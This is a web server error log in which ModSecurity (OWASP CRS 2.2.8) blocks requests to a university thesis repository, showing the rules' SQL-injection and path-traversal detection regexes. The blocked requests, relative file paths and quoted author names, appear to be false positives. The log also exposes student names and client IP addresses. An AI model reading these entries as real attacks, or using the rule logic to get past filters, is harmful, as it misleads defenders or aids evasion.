[Mon Aug 28 16:18:48.998856 2023] [:error] [pid 47153] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB 1 Daniel Ramdhani Permana.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxmeMCo-f0AALgxx60AAAAT"]
[Mon Aug 28 16:28:18.382164 2023] [:error] [pid 47266] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER-annur_fitri.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxossCo-f0AALii5scAAAAJ"]
[Mon Aug 28 16:28:22.127509 2023] [:error] [pid 47263] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//COVER-BAB II-annuur fitri.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZOxotsCo-f0AALif60wAAAAC"]
[Mon Aug 28 16:28:39.478614 2023] [:error] [pid 47202] [client 36.80.96.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_-_Otniel_Heru_Chrisardi_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxox8Co-f0AALhinCEAAAAL"]
[Mon Aug 28 16:34:16.609556 2023] [:error] [pid 47317] [client 47.128.17.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ivina Putriyana\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxqGMCo-f0AALjVnFUAAAAE"]
[Mon Aug 28 16:40:58.513372 2023] [:error] [pid 47511] [client 47.128.25.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Muhammad Bani Ihza Ilyasa\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxrqsCo-f0AALmXaRQAAAAC"]
[Mon Aug 28 16:50:29.164320 2023] [:error] [pid 47886] [client 140.213.24.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_MARIA_CLAUDIA_FRANSISKA_SINURAT_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxt5cCo-f0AALsO8jYAAAAJ"]
[Mon Aug 28 16:50:34.872950 2023] [:error] [pid 47863] [client 140.213.24.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/A_COVER_Evelina_Saritua_Situmorang_41152010180053_Manajemen_B1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOxt6sCo-f0AALr3bkoAAAAY"]
[Mon Aug 28 16:53:02.676966 2023] [:error] [pid 47850] [client 47.128.26.125] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Total Quality Management, Sistem Penghargaan, dan \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOxufsCo-f0AALrqh9UAAAAG"]
[Mon Aug 28 17:59:33.400129 2023] [:error] [pid 49148] [client 47.128.22.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Kenneth A. Smith\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx@FcCo-f0AAL-8V0AAAAAE"]
[Mon Aug 28 17:59:33.568424 2023] [:error] [pid 49148] [client 47.128.22.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Kenneth A. Smith\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOx@FcCo-f0AAL-8V0EAAAAE"]
[Mon Aug 28 19:20:32.626751 2023] [:error] [pid 50559] [client 114.122.70.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_MARIA_CLAUDIA_FRANSISKA_SINURAT_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyREMCo-f0AAMV-dh8AAAAM"]
[Mon Aug 28 19:37:28.241417 2023] [:error] [pid 50782] [client 47.128.28.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rima Siti Rahmah\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyVCMCo-f0AAMZeKn4AAAAK"]
[Mon Aug 28 20:10:16.407043 2023] [:error] [pid 51318] [client 47.128.31.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Lulu_Febi_f.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOycuMCo-f0AAMh2TGUAAAAE"]
[Mon Aug 28 20:25:02.965423 2023] [:error] [pid 51585] [client 111.94.81.232] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Cover_Shafira_Azzahra.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOygLsCo-f0AAMmBgS4AAAAB"]
[Mon Aug 28 20:29:32.332834 2023] [:error] [pid 51739] [client 47.128.27.146] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/Rina_Kartika_COVER.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyhPMCo-f0AAMobF@gAAAAC"]
[Mon Aug 28 20:36:20.345732 2023] [:error] [pid 51956] [client 47.128.24.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/a._Cover-1_Dhika_Yudha_Pradana.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOyi1MCo-f0AAMr0zUcAAAAK"]
[Mon Aug 28 20:40:01.661863 2023] [:error] [pid 51971] [client 47.128.29.178] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Asti Pirmanda Saputri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyjscCo-f0AAMsDIb4AAAAD"]
[Mon Aug 28 22:24:14.477325 2023] [:error] [pid 53581] [client 114.5.212.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/A._COVER,_Nenden_Akhsani_Solihah-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZOy8HsCo-f0AANFNjcUAAAAQ"]
[Tue Aug 29 03:56:49.048682 2023] [:error] [pid 58849] [client 40.77.167.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//BAB V Lulu Febi Fitrianita.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO0KEcCo-f0AAOXhck8AAAAH"]
[Tue Aug 29 05:44:06.007565 2023] [:error] [pid 60099] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Perputaran Modal Kerja, Perputaran Kas, Perputaran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0jNsCo-f0AAOrDWegAAAAL"]
[Tue Aug 29 06:46:22.732007 2023] [:error] [pid 60917] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kompensasi, Motivasi dan Kinerja Karyawan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0xzsCo-f0AAO310ZkAAAAG"]
[Tue Aug 29 06:46:35.151015 2023] [:error] [pid 60921] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kualitas Pelayanan, dan Kepuasan Konsumen\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0x28Co-f0AAO35zn0AAAAQ"]
[Tue Aug 29 07:50:45.444948 2023] [:error] [pid 61875] [client 216.244.66.246] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Kualitas Bahan Baku\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1A5cCo-f0AAPGz8G8AAAAC"]
[Tue Aug 29 08:34:53.143828 2023] [:error] [pid 62312] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/a._Cover_Triaji_Arif_Fanaro-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1LPcCo-f0AAPNoM2EAAAAC"]
[Tue Aug 29 08:35:14.147312 2023] [:error] [pid 62412] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//e. BAB IV Triaji Arif Fanaro.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1LUsCo-f0AAPPM-oEAAAAL"]
[Tue Aug 29 08:35:26.730788 2023] [:error] [pid 62428] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/a._Cover_Triaji_Arif_Fanaro-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1LXsCo-f0AAPPcBMkAAAAI"]
[Tue Aug 29 08:35:37.721199 2023] [:error] [pid 62351] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//f. BAB V Triaji Arif Fanaro.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1LacCo-f0AAPOPRFwAAAAD"]
[Tue Aug 29 08:35:45.967951 2023] [:error] [pid 62425] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/a._Cover_Triaji_Arif_Fanaro-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1LccCo-f0AAPPZgboAAAAE"]
[Tue Aug 29 08:35:50.913369 2023] [:error] [pid 62432] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//c. BAB II Triaji Arif Fanaro.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1LdsCo-f0AAPPgF1QAAAAP"]
[Tue Aug 29 08:35:58.169025 2023] [:error] [pid 62424] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//b. BAB I Triaji Arif Fanaro.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1LfsCo-f0AAPPYu-sAAAAB"]
[Tue Aug 29 08:43:44.202355 2023] [:error] [pid 62412] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/a._Cover_Triaji_Arif_Fanaro-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1NUMCo-f0AAPPM-o8AAAAL"]
[Tue Aug 29 08:43:50.560436 2023] [:error] [pid 62544] [client 202.80.219.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../repository//a. Cover - daftar lampiran Triaji Arif Fanaro.pdf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/js/pdfjs/web/viewer.html"] [unique_id "ZO1NVsCo-f0AAPRQeNMAAAAH"]
[Tue Aug 29 09:26:32.394494 2023] [:error] [pid 63488] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1XWMCo-f0AAPgAvtEAAAAH"]
[Tue Aug 29 09:26:32.463483 2023] [:error] [pid 63488] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:src: ../../images/docs/COVER_Fadiila_Hasyanah_41152020190024-1_page-0001.jpg.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/phpthumb/phpThumb.php"] [unique_id "ZO1XWMCo-f0AAPgAvtIAAAAH"]
